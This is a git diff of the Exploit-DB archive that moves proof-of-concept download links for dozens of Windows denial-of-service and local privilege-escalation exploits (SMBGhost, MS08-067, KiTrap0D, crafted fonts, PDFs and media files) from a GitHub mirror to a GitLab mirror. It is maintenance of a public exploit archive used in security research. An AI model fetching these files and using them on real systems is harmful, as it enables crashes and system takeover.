--git a/exploits/windows/dos/47268.txt b/exploits/windows/dos/47268.txt index bbcaa7d15..76c59a781 100644 --- a/exploits/windows/dos/47268.txt +++ b/exploits/windows/dos/47268.txt @@ -68,4 +68,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47268.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47268.zip \ No newline at end of file diff --git a/exploits/windows/dos/47269.txt b/exploits/windows/dos/47269.txt index 99b789ecc..ec1590e20 100644 --- a/exploits/windows/dos/47269.txt +++ b/exploits/windows/dos/47269.txt @@ -53,4 +53,4 @@ The issue reproduces on a fully updated Windows 10 1709; we haven't tested earli Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47269.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47269.zip \ No newline at end of file diff --git a/exploits/windows/dos/47270.txt b/exploits/windows/dos/47270.txt index 1ceead491..ef4d67435 100644 --- a/exploits/windows/dos/47270.txt +++ b/exploits/windows/dos/47270.txt @@ -99,4 +99,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47270.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47270.zip \ No newline at end of file diff --git a/exploits/windows/dos/47271.txt b/exploits/windows/dos/47271.txt index 281cede53..6225cfe2e 100644 --- a/exploits/windows/dos/47271.txt +++ b/exploits/windows/dos/47271.txt @@ -141,4 +141,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47271.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47271.zip \ No newline at end of file diff --git a/exploits/windows/dos/47272.txt b/exploits/windows/dos/47272.txt index c01be1fab..f5d7623da 100644 --- a/exploits/windows/dos/47272.txt +++ b/exploits/windows/dos/47272.txt @@ -46,4 +46,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47272.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47272.zip \ No newline at end of file diff --git a/exploits/windows/dos/47273.txt b/exploits/windows/dos/47273.txt index 282053ea1..ff527fbfa 100644 --- a/exploits/windows/dos/47273.txt +++ b/exploits/windows/dos/47273.txt @@ -70,4 +70,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47273.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47273.zip \ No newline at end of file diff --git a/exploits/windows/dos/47274.txt b/exploits/windows/dos/47274.txt index 7b385c86e..863331e78 100644 --- a/exploits/windows/dos/47274.txt +++ b/exploits/windows/dos/47274.txt @@ -91,4 +91,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47274.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47274.zip \ No newline at end of file diff --git a/exploits/windows/dos/47275.txt b/exploits/windows/dos/47275.txt index 0ffb4baf7..46adeb81a 100644 --- a/exploits/windows/dos/47275.txt +++ b/exploits/windows/dos/47275.txt @@ -101,4 +101,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47275.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47275.zip \ No newline at end of file diff --git a/exploits/windows/dos/47276.txt b/exploits/windows/dos/47276.txt index 4d92a05f4..295fa9e82 100644 --- a/exploits/windows/dos/47276.txt +++ b/exploits/windows/dos/47276.txt @@ -88,4 +88,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47276.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47276.zip \ No newline at end of file diff --git a/exploits/windows/dos/47277.txt b/exploits/windows/dos/47277.txt index 595ec1a4b..68ced8cb0 100644 --- a/exploits/windows/dos/47277.txt +++ b/exploits/windows/dos/47277.txt @@ -132,4 +132,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47277.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47277.zip \ No newline at end of file diff --git a/exploits/windows/dos/47278.txt b/exploits/windows/dos/47278.txt index 750fae162..034efd086 100644 --- a/exploits/windows/dos/47278.txt +++ b/exploits/windows/dos/47278.txt @@ -83,4 +83,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47278.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47278.zip \ No newline at end of file diff --git a/exploits/windows/dos/47279.txt b/exploits/windows/dos/47279.txt index 146f3aa1c..01c3fe443 100644 --- a/exploits/windows/dos/47279.txt +++ b/exploits/windows/dos/47279.txt @@ -114,4 +114,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47279.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47279.zip \ No newline at end of file diff --git a/exploits/windows/dos/47381.txt b/exploits/windows/dos/47381.txt index d4a088762..bbd7019e2 100644 --- a/exploits/windows/dos/47381.txt +++ b/exploits/windows/dos/47381.txt @@ -106,4 +106,4 @@ The issue reproduces on a fully updated Windows 7 and Windows 10 1709; we haven' Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47381.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47381.zip \ No newline at end of file diff --git a/exploits/windows/dos/47382.txt b/exploits/windows/dos/47382.txt index e2e5fb7b2..40abe192d 100644 --- a/exploits/windows/dos/47382.txt +++ b/exploits/windows/dos/47382.txt @@ -76,4 +76,4 @@ Attached is a pair of minimized PoC fonts, original fonts, and HTML files to rep Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47382.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47382.zip \ No newline at end of file diff --git a/exploits/windows/dos/47414.txt b/exploits/windows/dos/47414.txt index 62f320903..50f649f84 100644 --- a/exploits/windows/dos/47414.txt +++ b/exploits/windows/dos/47414.txt @@ -8,4 +8,4 @@ C:\> certutil.exe testcase.crt Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47414.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47414.zip \ No newline at end of file diff --git a/exploits/windows/dos/47484.txt b/exploits/windows/dos/47484.txt index 2a442cba9..1a56a98fa 100644 --- a/exploits/windows/dos/47484.txt +++ b/exploits/windows/dos/47484.txt @@ -78,4 +78,4 @@ Attached is an archive with the proof-of-concept mutated TTF file, the original Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47484.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47484.zip \ No newline at end of file diff --git a/exploits/windows/dos/47485.txt b/exploits/windows/dos/47485.txt index 2f2818e7a..bc9a10909 100644 --- a/exploits/windows/dos/47485.txt +++ b/exploits/windows/dos/47485.txt @@ -77,4 +77,4 @@ Attached is an archive with a minimized proof-of-concept PE image, the original Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47485.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47485.zip \ No newline at end of file diff --git a/exploits/windows/dos/47486.txt b/exploits/windows/dos/47486.txt index 67d568bcb..801241bd9 100644 --- a/exploits/windows/dos/47486.txt +++ b/exploits/windows/dos/47486.txt @@ -89,4 +89,4 @@ Attached is an archive with a minimized proof-of-concept PE image, the original Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47486.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47486.zip \ No newline at end of file diff --git a/exploits/windows/dos/47487.txt b/exploits/windows/dos/47487.txt index f54ebb144..c458eabd9 100644 --- a/exploits/windows/dos/47487.txt +++ b/exploits/windows/dos/47487.txt @@ -83,4 +83,4 @@ Attached is an archive with a minimized proof-of-concept PE image, the original Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47487.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47487.zip \ No newline at end of file diff --git a/exploits/windows/dos/47488.txt b/exploits/windows/dos/47488.txt index 12670a897..c082982e3 100644 --- a/exploits/windows/dos/47488.txt +++ b/exploits/windows/dos/47488.txt @@ -90,4 +90,4 @@ Attached is an archive with a minimized proof-of-concept PE image, the original Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47488.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47488.zip \ No newline at end of file diff --git a/exploits/windows/dos/47489.txt b/exploits/windows/dos/47489.txt index cf8e1adc5..95a9a6e35 100644 --- a/exploits/windows/dos/47489.txt +++ b/exploits/windows/dos/47489.txt @@ -76,4 +76,4 @@ Attached is an archive with two proof-of-concept PE images and the corresponding Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47489.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47489.zip \ No newline at end of file diff --git a/exploits/windows/dos/47528.txt b/exploits/windows/dos/47528.txt index 59e00f838..2ce1afd26 100644 --- a/exploits/windows/dos/47528.txt +++ b/exploits/windows/dos/47528.txt @@ -82,4 +82,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47528.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47528.zip \ No newline at end of file diff --git a/exploits/windows/dos/47609.txt b/exploits/windows/dos/47609.txt index 5737ee58a..fcda135ea 100644 --- a/exploits/windows/dos/47609.txt +++ b/exploits/windows/dos/47609.txt @@ -78,4 +78,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47609.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47609.zip \ No newline at end of file diff --git a/exploits/windows/dos/47610.txt b/exploits/windows/dos/47610.txt index eaaefbd57..22bdb5291 100644 --- a/exploits/windows/dos/47610.txt +++ b/exploits/windows/dos/47610.txt @@ -139,4 +139,4 @@ Mutated code: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47610.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47610.zip \ No newline at end of file diff --git a/exploits/windows/dos/47769.txt b/exploits/windows/dos/47769.txt index 007941fa8..39acf7c29 100644 --- a/exploits/windows/dos/47769.txt +++ b/exploits/windows/dos/47769.txt @@ -86,4 +86,4 @@ Notes: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47769.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47769.zip \ No newline at end of file diff --git a/exploits/windows/dos/47964.cpp b/exploits/windows/dos/47964.cpp index e8490dbec..d7fda2c52 100644 --- a/exploits/windows/dos/47964.cpp +++ b/exploits/windows/dos/47964.cpp @@ -2,8 +2,8 @@ /* EDB Note: -- Download (Binary) ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47964-1.exe -- Download (Source) ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47964-2.zip +- Download (Binary) ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47964-1.exe +- Download (Source) ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47964-2.zip */ diff --git a/exploits/windows/dos/48216.md b/exploits/windows/dos/48216.md index 34c3b6252..f88318e33 100644 --- a/exploits/windows/dos/48216.md +++ b/exploits/windows/dos/48216.md @@ -1,6 +1,6 @@ # CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost -Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip +Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48216.zip ## Usage diff --git a/exploits/windows/dos/5327.txt b/exploits/windows/dos/5327.txt index ecc2c090f..b755bfcfd 100644 --- a/exploits/windows/dos/5327.txt +++ b/exploits/windows/dos/5327.txt @@ -8,6 +8,6 @@ Download the file anywhere excluding on desktop and try to browse it with the Wi - Website - http://iron-team.com/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5327.doc (2008-Iron.Team.hack.the.planet.doc) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5327.doc (2008-Iron.Team.hack.the.planet.doc) # milw0rm.com [2008-03-31] \ No newline at end of file diff --git a/exploits/windows/dos/5687.txt b/exploits/windows/dos/5687.txt index 91059ee56..0265348c2 100644 --- a/exploits/windows/dos/5687.txt +++ b/exploits/windows/dos/5687.txt @@ -4,6 +4,6 @@ the reader deadly crash when a malformed Pdf file is opened: greetz to : Deimos, benjilenoob, Berga , http://spiritofhack.net/ -Poc : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5687.pdf (2008-HI2.pdf) +Poc : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5687.pdf (2008-HI2.pdf) # milw0rm.com [2008-05-29] \ No newline at end of file diff --git a/exploits/windows/dos/6330.txt b/exploits/windows/dos/6330.txt index 615ed5638..cf057d327 100644 --- a/exploits/windows/dos/6330.txt +++ b/exploits/windows/dos/6330.txt @@ -21,6 +21,6 @@ and causes Internet explorer to close silently. This is work in progress , i am still trying to make it run arbitary code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6330.rar (2008-EMF_DOS.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6330.rar (2008-EMF_DOS.rar) # milw0rm.com [2008-08-29] \ No newline at end of file diff --git a/exploits/windows/dos/6560.txt b/exploits/windows/dos/6560.txt index e0ad4dd80..0cd7ec7e2 100644 --- a/exploits/windows/dos/6560.txt +++ b/exploits/windows/dos/6560.txt @@ -1,6 +1,6 @@ MS Windows Wordpad .doc File Local Denial of Service PoC author: securfrog -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6560.rar (2008-crash.doc.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6560.rar (2008-crash.doc.rar) # milw0rm.com [2008-09-25] \ No newline at end of file diff --git a/exploits/windows/dos/6565.txt b/exploits/windows/dos/6565.txt index 2aabf1aec..ef0dd15e8 100644 --- a/exploits/windows/dos/6565.txt +++ b/exploits/windows/dos/6565.txt @@ -20,6 +20,6 @@ By: Aodrulez, Email: f3arm3d3ar@gmail.com ------------------------------------------------------------------ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6565.rar (2008-test7.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6565.rar (2008-test7.rar) # milw0rm.com [2008-09-25] \ No newline at end of file diff --git a/exploits/windows/dos/6616.txt b/exploits/windows/dos/6616.txt index 1d50ed109..0c6e93cd6 100644 --- a/exploits/windows/dos/6616.txt +++ b/exploits/windows/dos/6616.txt @@ -10,6 +10,6 @@ EBP 0007E358 Access Violation [FFFFFFFF] ---| -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6616.zip (2008-ExplorerDOS.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6616.zip (2008-ExplorerDOS.zip) # milw0rm.com [2008-09-28] \ No newline at end of file diff --git a/exploits/windows/dos/6658.txt b/exploits/windows/dos/6658.txt index b757cd9f7..dac49c76f 100644 --- a/exploits/windows/dos/6658.txt +++ b/exploits/windows/dos/6658.txt @@ -25,6 +25,6 @@ http://www.zeroscience.org ------------------------------------------------------------------------------------------------------------------------------ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6658.rar (2008-vba32_poc.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6658.rar (2008-vba32_poc.rar) # milw0rm.com [2008-10-03] \ No newline at end of file diff --git a/exploits/windows/dos/6732.txt b/exploits/windows/dos/6732.txt index ff6e5a6be..1f5cf3442 100644 --- a/exploits/windows/dos/6732.txt +++ b/exploits/windows/dos/6732.txt @@ -12,6 +12,6 @@ Causes Windows explorer and Internet explorer to crash. You can run arbitary code. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6732.rar (2008-emf_MS08-046.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6732.rar (2008-emf_MS08-046.rar) # milw0rm.com [2008-10-12] \ No newline at end of file diff --git a/exploits/windows/dos/677.txt b/exploits/windows/dos/677.txt index 47a824ba1..05243d00f 100644 --- a/exploits/windows/dos/677.txt +++ b/exploits/windows/dos/677.txt @@ -20,7 +20,7 @@ Solutions: There was no response. Exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/677.grs (c_skin.grs) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/677.grs (c_skin.grs) When you copy or click this link, getright automaticly download and try to load crafted skin and will trigger buffer overflow diff --git a/exploits/windows/dos/6824.txt b/exploits/windows/dos/6824.txt index 0c0e2b72a..80eea1105 100644 --- a/exploits/windows/dos/6824.txt +++ b/exploits/windows/dos/6824.txt @@ -21,6 +21,6 @@ You need a slash on the stack prior to the input buffer. So play around a bit, you'll get it working reliably... poc: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6824.zip (2008-ms08-067.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6824.zip (2008-ms08-067.zip) # milw0rm.com [2008-10-23] \ No newline at end of file diff --git a/exploits/windows/dos/7178.txt b/exploits/windows/dos/7178.txt index e568eded7..85200f1cf 100644 --- a/exploits/windows/dos/7178.txt +++ b/exploits/windows/dos/7178.txt @@ -19,6 +19,6 @@ ESI 04354E18 EDI 04352100 EIP 775781CB ntdll.775781CB -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7178.zip (2008-BitDefenderDOS.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7178.zip (2008-BitDefenderDOS.zip) # milw0rm.com [2008-11-20] \ No newline at end of file diff --git a/exploits/windows/dos/770.txt b/exploits/windows/dos/770.txt index cf3beb2b8..5ddf438b3 100644 --- a/exploits/windows/dos/770.txt +++ b/exploits/windows/dos/770.txt @@ -15,7 +15,7 @@ will can cause the remote system to crash. --Uncompleted qtif image file header http://www.atmacasoft.com/exp/vuln.qtif.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/770.qtif (vuln.qtif) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/770.qtif (vuln.qtif) 00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............ 0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM diff --git a/exploits/windows/dos/8090.txt b/exploits/windows/dos/8090.txt index 8d0b5c9e1..75ba9eb4f 100644 --- a/exploits/windows/dos/8090.txt +++ b/exploits/windows/dos/8090.txt @@ -1,5 +1,5 @@ causes an exception at 41414141 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8090.pdf (2009-41414141.pdf) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8090.pdf (2009-41414141.pdf) # milw0rm.com [2009-02-23] \ No newline at end of file diff --git a/exploits/windows/dos/8281.txt b/exploits/windows/dos/8281.txt index 4da8f4547..a724e1cae 100644 --- a/exploits/windows/dos/8281.txt +++ b/exploits/windows/dos/8281.txt @@ -4,6 +4,6 @@ Write up by redsand@blacksecurity.org : http://bl4cksecurity.blogspot.com/2009/0 Credits to mIKEJONES for providing the .EMF Crash down: http://www.blacksecurity.org/voltage-exploit.emf -back: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8281.emf (2009-voltage-exploit.emf) +back: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8281.emf (2009-voltage-exploit.emf) # milw0rm.com [2009-03-24] \ No newline at end of file diff --git a/exploits/windows/dos/8306.txt b/exploits/windows/dos/8306.txt index d0308fbae..8c61d074e 100644 --- a/exploits/windows/dos/8306.txt +++ b/exploits/windows/dos/8306.txt @@ -1,5 +1,5 @@ Firefox memory corruption PoC/DoS in XUL (XML) parser -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8306.rar (2009-Firefox-XUL-0day-PoC.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8306.rar (2009-Firefox-XUL-0day-PoC.rar) # milw0rm.com [2009-03-30] \ No newline at end of file diff --git a/exploits/windows/dos/8837.txt b/exploits/windows/dos/8837.txt index 312cb6922..5b1a0e8a9 100644 --- a/exploits/windows/dos/8837.txt +++ b/exploits/windows/dos/8837.txt @@ -56,7 +56,7 @@ ################################################################################ >>> *** PoC: http://www.zeroscience.org/codes/aimp2_evil.mp3 ~2.92 MB <<< ->>> *** PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8837.mp3 (2009-aimp2_evil.mp3) ~2.92 MB <<< +>>> *** PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8837.mp3 (2009-aimp2_evil.mp3) ~2.92 MB <<< ################################################################################ diff --git a/exploits/windows/dos/9167.txt b/exploits/windows/dos/9167.txt index 749f5fb0f..f341d6629 100644 --- a/exploits/windows/dos/9167.txt +++ b/exploits/windows/dos/9167.txt @@ -23,7 +23,7 @@ cccccccc ?? == *** Proof Of Concept: http://zeroscience.org/codes/aimp2_evil.mp3 http://www.zeroscience.mk/old/codes/aimp2_evil.mp3 - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) ** Note: The same PoC used in: - http://secunia.com/advisories/35305/ diff --git a/exploits/windows/dos/9169.py b/exploits/windows/dos/9169.py index d825463eb..a5748a89c 100755 --- a/exploits/windows/dos/9169.py +++ b/exploits/windows/dos/9169.py @@ -75,7 +75,7 @@ # # # - 1. http://zeroscience.org/codes/aimp2_evil.mp3 # # # - # - 2. https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) (mirror) # + # - 2. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) (mirror) # # # # - 3. http://securityreason.com/download/11/13 (mirror) # # # diff --git a/exploits/windows/dos/9170.txt b/exploits/windows/dos/9170.txt index b76952a68..a7f77ed29 100644 --- a/exploits/windows/dos/9170.txt +++ b/exploits/windows/dos/9170.txt @@ -44,7 +44,7 @@ http://www.zeroscience.org/ PoC: 1. http://zeroscience.org/codes/aimp2_evil.mp3 - 2. https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) + 2. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9167.mp3 (2009-aimp2_evil.mp3) 3. http://securityreason.com/download/11/13 # milw0rm.com [2009-07-16] \ No newline at end of file diff --git a/exploits/windows/dos/9417.txt b/exploits/windows/dos/9417.txt index b1c2a5495..ffc000afe 100644 --- a/exploits/windows/dos/9417.txt +++ b/exploits/windows/dos/9417.txt @@ -1,6 +1,6 @@ MS Windows 2003 (EOT File) BSOD Crash Exploit author: webDEViL -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9417.zip (2009-wwbsod.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/9417.zip (2009-wwbsod.zip) # milw0rm.com [2009-08-11] \ No newline at end of file diff --git a/exploits/windows/local/11139.c b/exploits/windows/local/11139.c index a3193aff1..d9aae3b66 100644 --- a/exploits/windows/local/11139.c +++ b/exploits/windows/local/11139.c @@ -517,4 +517,4 @@ Stack: void print(char* msg) { printf("\n[*]%s\n",msg); - } + } \ No newline at end of file diff --git a/exploits/windows/local/11199.txt b/exploits/windows/local/11199.txt index 33b0ce06c..6d82c466a 100644 --- a/exploits/windows/local/11199.txt +++ b/exploits/windows/local/11199.txt @@ -1,4 +1,4 @@ -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11199.zip (KiTrap0D.zip) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11199.zip (KiTrap0D.zip) E-DB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder. @@ -158,7 +158,7 @@ Possibly naive example code for triggering this condition is available from the link below. http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11199.zip (KiTrap0D.zip) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11199.zip (KiTrap0D.zip) The code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista and Windows 7. Support for other affected operating systems is left as an diff --git a/exploits/windows/local/11987.txt b/exploits/windows/local/11987.txt index b63c80acd..ee30624e8 100644 --- a/exploits/windows/local/11987.txt +++ b/exploits/windows/local/11987.txt @@ -24,7 +24,7 @@ With Foxit Reader, no warning is displayed: I’m not publishing my PoC PDF yet, but you can download a PDF that will just launch cmd.exe here. Use it to test your PDF reader: - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11987.zip (launch-action-cmd.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11987.zip (launch-action-cmd.zip) With Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don’t use JavaScript in my PoC PDF), and patching Adobe Reader isn’t possible (I’m not exploiting a vulnerability, just being creative with the PDF language specs). diff --git a/exploits/windows/local/12497.c b/exploits/windows/local/12497.c index 75352068d..aaf971042 100644 --- a/exploits/windows/local/12497.c +++ b/exploits/windows/local/12497.c @@ -135,4 +135,4 @@ s[i]=alphanum[rand()%(sizeof(alphanum)-1)]; } s[len]=0; - } + } \ No newline at end of file diff --git a/exploits/windows/local/12710.c b/exploits/windows/local/12710.c index 1620ba4f7..f1b55166c 100644 --- a/exploits/windows/local/12710.c +++ b/exploits/windows/local/12710.c @@ -281,7 +281,4 @@ printf("OK!\n "); getchar(); return 0; -} - - - +} \ No newline at end of file diff --git a/exploits/windows/local/14403.txt b/exploits/windows/local/14403.txt index fa9efa42c..896553641 100644 --- a/exploits/windows/local/14403.txt +++ b/exploits/windows/local/14403.txt @@ -5,7 +5,7 @@ From: http://www.ivanlef0u.tuxfamily.org/?p=411 3. Look at your logs. http://ivanlef0u.nibbles.fr/repo/suckme.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14403.rar (suckme.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14403.rar (suckme.rar) Tested under XP SP3. diff --git a/exploits/windows/local/14610.txt b/exploits/windows/local/14610.txt index f72c81724..0bae2c586 100644 --- a/exploits/windows/local/14610.txt +++ b/exploits/windows/local/14610.txt @@ -5,4 +5,4 @@ Microsoft Windows is prone to a local privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Code: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14610.zip (Chimichurri-CVE-2010-2554.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14610.zip (Chimichurri-CVE-2010-2554.zip) \ No newline at end of file diff --git a/exploits/windows/local/14744.c b/exploits/windows/local/14744.c index 1836116cc..139441a04 100644 --- a/exploits/windows/local/14744.c +++ b/exploits/windows/local/14744.c @@ -22,4 +22,4 @@ int evil() return 0; } -// POC: 